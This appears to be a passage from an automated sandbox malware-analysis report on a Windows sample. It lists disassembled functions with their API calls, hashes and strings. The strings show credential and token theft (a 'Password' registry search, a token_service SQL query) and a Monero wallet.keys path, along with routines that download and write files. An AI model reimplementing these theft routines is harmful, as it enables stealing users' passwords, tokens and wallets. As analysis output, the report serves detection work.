                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: 03d5b3e13533ae5a840144bca5c6d09bce71ee6526a1c1562c294f4da37d6250
                      • Instruction ID: 7625cccbcdad741bf49c2794933d9574cc5efe9fc9ca8b97959dab3f8e6b419d
                      • Opcode Fuzzy Hash: 03d5b3e13533ae5a840144bca5c6d09bce71ee6526a1c1562c294f4da37d6250
                      • Instruction Fuzzy Hash: 802127B1A4420CABDB14DFD4DD49FAEBBB8EB44B00F104219F715BB284D7B869018BA5
                      Function 00EE60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                        • Part of subcall function 00EE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EE4839
                        • Part of subcall function 00EE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EE4849
                      • InternetOpenA.WININET(00F00DF7,00000001,00000000,00000000,00000000), ref: 00EE610F
                      • StrCmpCA.SHLWAPI(?,0168E470), ref: 00EE6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EE618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EE61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00EE61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EE620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 00EE6249
                      • InternetCloseHandle.WININET(?), ref: 00EE6253
                      • InternetCloseHandle.WININET(00000000), ref: 00EE6260
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: c42068cb8608bbbca9506fce691aeb70267c4af669b95a61924ed28735e145d6
                      • Instruction ID: 6e2c2ac89f569e7e2f494aae1892872294a3df3e61e171a83f84ba6db1f7a405
                      • Opcode Fuzzy Hash: c42068cb8608bbbca9506fce691aeb70267c4af669b95a61924ed28735e145d6
                      • Instruction Fuzzy Hash: 96516DB190020CABDB24DF51DC49BEE77B8AB44345F1080A8E709BB180DB756A85CF95
                      Function 00EE72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EE733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EE73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EE740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE7452
                      • HeapFree.KERNEL32(00000000), ref: 00EE7459
                      • task.LIBCPMTD ref: 00EE7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuetask
                      • String ID: Password
                      • API String ID: 775622407-3434357891
                      • Opcode ID: 0d9d5976909be7277811f740934aa70634c04c08d646abeb30c730eeca852157
                      • Instruction ID: ab96113e8bab28bb4b0721af4f89c2e3731c2ebdde93908edefb79fd4f608c51
                      • Opcode Fuzzy Hash: 0d9d5976909be7277811f740934aa70634c04c08d646abeb30c730eeca852157
                      • Instruction Fuzzy Hash: 39611DB590415C9BDB24DF51DD41BD977B8BF48304F0091E9E689A6181EBB05FC9CFA0
                      Function 00EEBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00EFA740: lstrcpy.KERNEL32(00F00E17,00000000), ref: 00EFA788
                        • Part of subcall function 00EFA9B0: lstrlen.KERNEL32(?,016888F8,?,\Monero\wallet.keys,00F00E17), ref: 00EFA9C5
                        • Part of subcall function 00EFA9B0: lstrcpy.KERNEL32(00000000), ref: 00EFAA04
                        • Part of subcall function 00EFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EFAA12
                        • Part of subcall function 00EFA920: lstrcpy.KERNEL32(00000000,?), ref: 00EFA972
                        • Part of subcall function 00EFA920: lstrcat.KERNEL32(00000000), ref: 00EFA982
                        • Part of subcall function 00EFA8A0: lstrcpy.KERNEL32(?,00F00E17), ref: 00EFA905
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • lstrlen.KERNEL32(00000000), ref: 00EEBC9F
                        • Part of subcall function 00EF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EF8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 00EEBCCD
                      • lstrlen.KERNEL32(00000000), ref: 00EEBDA5
                      • lstrlen.KERNEL32(00000000), ref: 00EEBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 86c23cdb85dbf98bfff1d2b92dc1e4ccbcbe7de55686e8a221b3d3838725b5cd
                      • Instruction ID: 84007ad4197b70b73a45ccd08aefdfb1df200c35bc53fc67cd69499325fe4856
                      • Opcode Fuzzy Hash: 86c23cdb85dbf98bfff1d2b92dc1e4ccbcbe7de55686e8a221b3d3838725b5cd
                      • Instruction Fuzzy Hash: 6CB145B291014CABDB18FBA0DC56DFE73B8AF54300F445178F60AB6095EF746A49CB62
                      Function 00EF6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 233014239fb03014b34dc1b438372cc6b2edea4beeab9d33d60cc607d15daf33
                      • Instruction ID: efc8881426c2115bd1fcfc745dade9e78f94488f319b99238feee0af88335bc3
                      • Opcode Fuzzy Hash: 233014239fb03014b34dc1b438372cc6b2edea4beeab9d33d60cc607d15daf33
                      • Instruction Fuzzy Hash: 8BF03A30904209FFD368AFE0B50972CBB74FF14707F0401A9E61AD76C4E6714AA19B99
                      Function 00EE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EE4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EE4FD1
                      • InternetOpenA.WININET(00F00DDF,00000000,00000000,00000000,00000000), ref: 00EE4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EE5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EE5041
                      • InternetCloseHandle.WININET(?), ref: 00EE50B9
                      • InternetCloseHandle.WININET(?), ref: 00EE50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 8fc7f19e670bc0240baccee4a0abba4cd570ba9991402ef5e00ca009233a4414
                      • Instruction ID: e54bb1707ac8f0d5af2b6034610963786390f05e36c404427d95310fa261ed6f
                      • Opcode Fuzzy Hash: 8fc7f19e670bc0240baccee4a0abba4cd570ba9991402ef5e00ca009233a4414
                      • Instruction Fuzzy Hash: DF31E7B5A0021CABDB24CF54DC85BD9B7B5EB48704F1081E9F709A7285D6706EC58F98
                      Function 00EF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EF8426
                      • wsprintfA.USER32 ref: 00EF8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EF847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8499
                        • Part of subcall function 00EFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EFA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0168DC98,00000000,000F003F,?,00000400), ref: 00EF84EC
                      • lstrlen.KERNEL32(?), ref: 00EF8501
                      • RegQueryValueExA.ADVAPI32(00000000,0168DC80,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00F00B34), ref: 00EF8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: c03e5805b641389cf9063c5de52e893145e9069406b9ee75359451da0fcc9b7c
                      • Instruction ID: 669de3ecc9a7b7784c26441d6d4c5e4a22fb7d68a7aee118f88348d4ac0d1cbe
                      • Opcode Fuzzy Hash: c03e5805b641389cf9063c5de52e893145e9069406b9ee75359451da0fcc9b7c
                      • Instruction Fuzzy Hash: CC21D6B191021CABDB28DF54DC85FE9B7B8FF48704F00C5A9E609A6180DF71AA85CF94
                      Function 00EF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0167B6C0,00000000,00020119,00000000), ref: 00EF76DD
                      • RegQueryValueExA.ADVAPI32(00000000,0168DCC8,00000000,00000000,?,000000FF), ref: 00EF76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 00EF7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: 8b9ee87494422fa4886aa00bac70f706b0739146f58acad5df599dab46d627fb
                      • Instruction ID: f6080803d3b8544ea958665b60349f13e250d425ea106b25998f22c563b9cd18
                      • Opcode Fuzzy Hash: 8b9ee87494422fa4886aa00bac70f706b0739146f58acad5df599dab46d627fb
                      • Instruction Fuzzy Hash: 0E0184B4A04208BBD724DFE0E849F7977B8EF44702F104065FB55E7284D6B099508B50
                      Function 00EF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EF7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00EF773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0167B6C0,00000000,00020119,00EF76B9), ref: 00EF775B
                      • RegQueryValueExA.ADVAPI32(00EF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EF777A
                      • RegCloseKey.ADVAPI32(00EF76B9), ref: 00EF7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 778c1cb3a4a709602c46321dc7a9d1eea5c2cf3a6d92425ad94589c2cf28939f
                      • Instruction ID: 926435ec5e2c14a48596d8f5ce975b71c67f2bc272ec5ec6e96d00bc0c9f2524
                      • Opcode Fuzzy Hash: 778c1cb3a4a709602c46321dc7a9d1eea5c2cf3a6d92425ad94589c2cf28939f
                      • Instruction Fuzzy Hash: 460184B5A00308BBDB24DFE0EC49FAEB7B8EF44701F004064FB15A7284DAB056508B50
                      Function 00EF92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EF3AEE,?), ref: 00EF92FC
                      • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EF9319
                      • CloseHandle.KERNEL32(000000FF), ref: 00EF9327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000012C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.000000000139F000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627546380.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627786841.00000000013D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627895362.0000000001571000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627911280.0000000001572000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_ee0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :$:
                      • API String ID: 1378416451-4250114551
                      • Opcode ID: 0fd09693204325a4f9b3196d44725b4f4dc82f7c9e0fddb4bf38fef6a5f0de88
                      • Instruction ID: dbaf8161ca8f0bfe054d29fcec00e27901ef986256ed3dc00fc48842a4be4813
                      • Opcode Fuzzy Hash: 0fd09693204325a4f9b3196d44725b4f4dc82f7c9e0fddb4bf38fef6a5f0de88
                      • Instruction Fuzzy Hash: 3DF04F35E40208BBDB34DFB4EC49FAE77B9AB48710F10C264FA61A72C4D67196518B44
                      Function 00EE99C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EE99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EE9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 00EE9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,00EE148F,00000000), ref: 00EE9A5A
                      • LocalFree.KERNEL32(00EE148F), ref: 00EE9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 00EE9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1627399781.0000000000EE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                      • Associated: 00000000.00000002.1627388243.0000000000EE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F91000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1627399781.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
